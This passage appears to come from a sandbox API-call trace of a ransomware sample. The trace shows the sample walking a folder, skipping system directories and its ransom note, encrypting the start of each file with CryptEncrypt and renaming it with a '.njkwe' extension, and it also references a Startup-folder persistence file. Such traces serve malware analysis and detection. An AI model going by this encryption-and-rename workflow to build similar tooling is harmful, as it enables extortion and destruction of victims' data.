ftLastWriteTime.dwLowDateTime=0x7626f700, ftLastWriteTime.dwHighDateTime=0x1cac6f6, nFileSizeHigh=0x0, nFileSizeLow=0x79000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="netfx_Extended_x86.msi", cAlternateFileName="NETFX_~4.MSI")) returned 1 [0064.042] lstrcmpiW (lpString1="netfx_Extended_x86.msi", lpString2="Windows") returned -1 [0064.042] lstrcmpiW (lpString1="netfx_Extended_x86.msi", lpString2="$Recycle.bin") returned 1 [0064.042] lstrcmpiW (lpString1="netfx_Extended_x86.msi", lpString2="System Volume Information") returned -1 [0064.042] lstrcmpiW (lpString1="netfx_Extended_x86.msi", lpString2="Program Files") returned -1 [0064.042] lstrcmpiW (lpString1="netfx_Extended_x86.msi", lpString2="Program Files (x86)") returned -1 [0064.043] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 48 [0064.043] StrStrIW (lpFirst="netfx_Extended_x86.msi", lpSrch=".njkwe") returned 0x0 [0064.043] lstrcmpW (lpString1="netfx_Extended_x86.msi", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.043] lstrcmpW (lpString1="netfx_Extended_x86.msi", lpString2="taridd") returned -1 [0064.043] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.043] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.043] GetTickCount () returned 0x11506c3 [0064.043] GetTickCount () returned 0x11506c3 [0064.043] GetTickCount () returned 0x11506c3 [0064.043] GetTickCount () returned 0x11506c3 [0064.043] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0064.043] GetProcessHeap () returned 0xbe0000 [0064.043] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0064.043] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.045] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.045] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.045] GetProcessHeap () returned 0xbe0000 [0064.045] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0064.045] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.045] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0064.046] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0064.046] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0064.046] CloseHandle (hObject=0x428) returned 1 [0064.062] GetProcessHeap () returned 0xbe0000 [0064.062] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.062] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi_r00t_{3sXlE5}.njkwe") returned 68 [0064.062] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended_x86.msi_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi_r00t_{3sxle5}.njkwe")) returned 1 [0064.062] GetProcessHeap () returned 0xbe0000 [0064.063] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.063] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4a0f7400, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x4a0f7400, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x4a0f7400, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x426ae, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ParameterInfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0064.063] lstrcmpiW (lpString1="ParameterInfo.xml", lpString2="Windows") returned -1 [0064.063] lstrcmpiW (lpString1="ParameterInfo.xml", lpString2="$Recycle.bin") returned 1 [0064.063] lstrcmpiW (lpString1="ParameterInfo.xml", lpString2="System Volume Information") returned -1 [0064.063] lstrcmpiW (lpString1="ParameterInfo.xml", lpString2="Program Files") returned -1 [0064.063] lstrcmpiW (lpString1="ParameterInfo.xml", lpString2="Program Files (x86)") returned -1 [0064.063] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 43 [0064.063] StrStrIW (lpFirst="ParameterInfo.xml", lpSrch=".njkwe") returned 0x0 [0064.063] lstrcmpW (lpString1="ParameterInfo.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.063] lstrcmpW (lpString1="ParameterInfo.xml", lpString2="taridd") returned -1 [0064.063] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.063] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.064] GetTickCount () returned 0x11506d2 [0064.064] GetTickCount () returned 0x11506d2 [0064.064] GetTickCount () returned 0x11506d2 [0064.064] GetTickCount () returned 0x11506d2 [0064.064] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0064.064] GetProcessHeap () returned 0xbe0000 [0064.064] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0064.064] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.067] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.067] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.067] GetProcessHeap () returned 0xbe0000 [0064.067] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0064.067] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.067] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0064.068] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0064.069] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0064.069] CloseHandle (hObject=0x428) returned 1 [0064.074] GetProcessHeap () returned 0xbe0000 [0064.074] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.075] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml_r00t_{3sXlE5}.njkwe") returned 63 [0064.075] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml_r00t_{3sxle5}.njkwe")) returned 1 [0064.075] GetProcessHeap () returned 0xbe0000 [0064.075] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.075] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x19dedd00, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x19dedd00, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x19dedd00, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x2d200, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RGB9RAST_x64.msi", cAlternateFileName="RGB9RA~1.MSI")) returned 1 [0064.075] lstrcmpiW (lpString1="RGB9RAST_x64.msi", lpString2="Windows") returned -1 [0064.075] lstrcmpiW (lpString1="RGB9RAST_x64.msi", lpString2="$Recycle.bin") returned 1 [0064.075] lstrcmpiW (lpString1="RGB9RAST_x64.msi", lpString2="System Volume Information") returned -1 [0064.075] lstrcmpiW (lpString1="RGB9RAST_x64.msi", lpString2="Program Files") returned 1 [0064.075] lstrcmpiW (lpString1="RGB9RAST_x64.msi", lpString2="Program Files (x86)") returned 1 [0064.075] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned 42 [0064.075] StrStrIW (lpFirst="RGB9RAST_x64.msi", lpSrch=".njkwe") returned 0x0 [0064.075] lstrcmpW (lpString1="RGB9RAST_x64.msi", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.075] lstrcmpW (lpString1="RGB9RAST_x64.msi", lpString2="taridd") returned -1 [0064.075] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.075] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.077] GetTickCount () returned 0x11506e2 [0064.077] GetTickCount () returned 0x11506e2 [0064.077] GetTickCount () returned 0x11506e2 [0064.077] GetTickCount () returned 0x11506e2 [0064.077] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0064.077] GetProcessHeap () returned 0xbe0000 [0064.077] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0064.077] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.079] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.079] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.079] GetProcessHeap () returned 0xbe0000 [0064.079] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0064.079] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.079] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0064.080] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0064.080] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0064.080] CloseHandle (hObject=0x428) returned 1 [0064.084] GetProcessHeap () returned 0xbe0000 [0064.084] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.084] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi_r00t_{3sXlE5}.njkwe") returned 62 [0064.084] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9RAST_x64.msi_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi_r00t_{3sxle5}.njkwe")) returned 1 [0064.085] GetProcessHeap () returned 0xbe0000 [0064.085] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.085] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x177c8300, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x177c8300, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x177c8300, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x17200, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RGB9Rast_x86.msi", cAlternateFileName="RGB9RA~2.MSI")) returned 1 [0064.085] lstrcmpiW (lpString1="RGB9Rast_x86.msi", lpString2="Windows") returned -1 [0064.085] lstrcmpiW (lpString1="RGB9Rast_x86.msi", lpString2="$Recycle.bin") returned 1 [0064.085] lstrcmpiW (lpString1="RGB9Rast_x86.msi", lpString2="System Volume Information") returned -1 [0064.085] lstrcmpiW (lpString1="RGB9Rast_x86.msi", lpString2="Program Files") returned 1 [0064.085] lstrcmpiW (lpString1="RGB9Rast_x86.msi", lpString2="Program Files (x86)") returned 1 [0064.085] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 42 [0064.085] StrStrIW (lpFirst="RGB9Rast_x86.msi", lpSrch=".njkwe") returned 0x0 [0064.085] lstrcmpW (lpString1="RGB9Rast_x86.msi", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.085] lstrcmpW (lpString1="RGB9Rast_x86.msi", lpString2="taridd") returned -1 [0064.085] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.085] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.085] GetTickCount () returned 0x11506e2 [0064.085] GetTickCount () returned 0x11506e2 [0064.085] GetTickCount () returned 0x11506e2 [0064.085] GetTickCount () returned 0x11506e2 [0064.085] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0064.086] GetProcessHeap () returned 0xbe0000 [0064.086] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0064.086] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.092] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.092] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.092] GetProcessHeap () returned 0xbe0000 [0064.092] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0064.092] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.092] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0064.092] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0064.092] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0064.092] CloseHandle (hObject=0x428) returned 1 [0064.095] GetProcessHeap () returned 0xbe0000 [0064.095] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.095] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi_r00t_{3sXlE5}.njkwe") returned 62 [0064.095] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\RGB9Rast_x86.msi_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi_r00t_{3sxle5}.njkwe")) returned 1 [0064.095] GetProcessHeap () returned 0xbe0000 [0064.095] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.095] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x13148, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Setup.exe", cAlternateFileName="")) returned 1 [0064.095] lstrcmpiW (lpString1="Setup.exe", lpString2="Windows") returned -1 [0064.095] lstrcmpiW (lpString1="Setup.exe", lpString2="$Recycle.bin") returned 1 [0064.095] lstrcmpiW (lpString1="Setup.exe", lpString2="System Volume Information") returned -1 [0064.095] lstrcmpiW (lpString1="Setup.exe", lpString2="Program Files") returned 1 [0064.095] lstrcmpiW (lpString1="Setup.exe", lpString2="Program Files (x86)") returned 1 [0064.096] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Setup.exe") returned 35 [0064.096] StrStrIW (lpFirst="Setup.exe", lpSrch=".njkwe") returned 0x0 [0064.096] lstrcmpW (lpString1="Setup.exe", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.096] lstrcmpW (lpString1="Setup.exe", lpString2="taridd") returned -1 [0064.096] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Setup.exe", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.096] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.096] GetTickCount () returned 0x11506f2 [0064.096] GetTickCount () returned 0x11506f2 [0064.096] GetTickCount () returned 0x11506f2 [0064.096] GetTickCount () returned 0x11506f2 [0064.096] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0064.096] GetProcessHeap () returned 0xbe0000 [0064.096] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0064.096] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.098] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.098] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.099] GetProcessHeap () returned 0xbe0000 [0064.099] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0064.099] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.099] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0064.099] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0064.099] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0064.099] CloseHandle (hObject=0x428) returned 1 [0064.111] GetProcessHeap () returned 0xbe0000 [0064.111] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.111] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Setup.exe_r00t_{3sXlE5}.njkwe") returned 55 [0064.111] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Setup.exe_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\setup.exe_r00t_{3sxle5}.njkwe")) returned 1 [0064.112] GetProcessHeap () returned 0xbe0000 [0064.112] 